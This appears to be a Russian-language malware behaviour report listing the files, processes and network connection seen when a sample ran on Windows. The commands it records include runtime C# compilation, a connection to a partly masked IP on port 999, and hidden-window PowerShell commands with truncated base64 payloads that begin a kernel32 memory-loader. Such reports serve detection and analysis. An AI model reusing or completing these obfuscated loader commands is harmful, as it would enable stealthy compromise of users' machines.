Техническая информация
- %TEMP%\a7qpisu5.0.cs
- %TEMP%\a7qpisu5.cmdline
- %TEMP%\a7qpisu5.out
- %TEMP%\cscd02.tmp
- %TEMP%\resd03.tmp
- %TEMP%\a7qpisu5.dll
- %TEMP%\resd03.tmp
- %TEMP%\cscd02.tmp
- %TEMP%\a7qpisu5.0.cs
- %TEMP%\a7qpisu5.pdb
- %TEMP%\a7qpisu5.cmdline
- %TEMP%\a7qpisu5.out
- %TEMP%\a7qpisu5.dll
- '16#.#20.167.138':999
- '%WINDIR%\microsoft.net\framework\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\a7qpisu5.cmdline"' (со скрытым окном)
- '%WINDIR%\microsoft.net\framework\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RESD03.tmp" "%TEMP%\CSCD02.tmp"' (со скрытым окном)
- '%WINDIR%\syswow64\cmd.exe' /c powershell -w 1 -C "sv rmkxI - ; sv Ll ec; sv Ftte((gv rmkxI).value.toString() + (gv Ll).value.toString()); powershell(gv Ftte).value.toString() ('JAB0AGYAQwAgAD0AIAAnACQAZwBuAG4AUgAgAD0AIAA...
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -ec JAB0AGYAQwAgAD0AIAAnACQAZwBuAG4AUgAgAD0AIAAnACcAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0A...
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -ec JABnAG4AbgBSACAAPQAgACcAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABWAGkAcgB0AHUAYQBsA...
- '%WINDIR%\microsoft.net\framework\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\a7qpisu5.cmdline"
- '%WINDIR%\microsoft.net\framework\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RESD03.tmp" "%TEMP%\CSCD02.tmp"